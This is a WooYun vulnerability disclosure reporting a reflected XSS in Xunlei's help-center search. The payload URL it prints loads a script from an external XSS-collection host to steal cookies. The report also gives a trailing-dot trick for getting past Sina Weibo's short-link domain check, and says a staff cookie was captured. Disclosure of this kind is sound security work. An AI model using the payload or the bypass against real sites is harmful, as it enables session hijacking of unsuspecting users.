当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016270

漏洞标题:迅雷在线客服系统反射型XSS成功盗取cookie+新浪微博网址检查bypass

相关厂商:迅雷

漏洞作者: Allmylife

提交时间:2012-12-20 14:16

修复时间:2013-02-03 14:16

公开时间:2013-02-03 14:16

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-20: 细节已通知厂商并且等待厂商处理中
2012-12-20: 厂商已经确认,细节仅向厂商公开
2012-12-30: 细节向核心白帽子及相关领域专家公开
2013-01-09: 细节向普通白帽子公开
2013-01-19: 细节向实习白帽子公开
2013-02-03: 细节向公众公开

简要描述:

提交了一个反射型的跨站,只弹个框框,被乌云忽略了,好吧,还得盗取cookie啊。

详细说明:

帮助搜索的地方,过滤不严,可以输入跨站脚本

1.jpg


但是http://help.xunlei.com没找到可以直接给客服发消息的地方,只好转向迅雷官方微博

http://help.xunlei.com/searchResult.html?searchstr=%E2%80%9D%3Cscript%20src=%22http://xsscn.sinaapp.com/?u=8349dd%22%20%3E%20%3C/script%3E%3C!--
这个链接用126.am转一下
http:/126.am/Zj84p4
呵呵,这里面有个小技巧,我想了一会才想到,因为新浪微博不让直接提交126.am的短网址。

2.jpg


我是这样想的,应该是新浪用规则提取出了,域名判断,怎么办呢,哈哈
好吧,我们在域名后面加个点吧。
http://126.am./Zj84p4

3.jpg


哈哈.成功了。

4.jpg


我想这个方法应该可以绕过新浪微博所有的域名的检查,唉,应该比这个xss有价值吧。

漏洞证明:

最后成功盗取了一个cookie,
可惜没能登录,呵呵

5.jpg


6.jpg

修复方案:

迅雷,修复xss吧
新浪,修复这个bypass吧。
迅雷会员快到期了,求白金会员卡。哈哈

版权声明:转载请注明来源 Allmylife@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-12-20 17:36

厂商回复:

感谢反馈!

最新状态:

暂无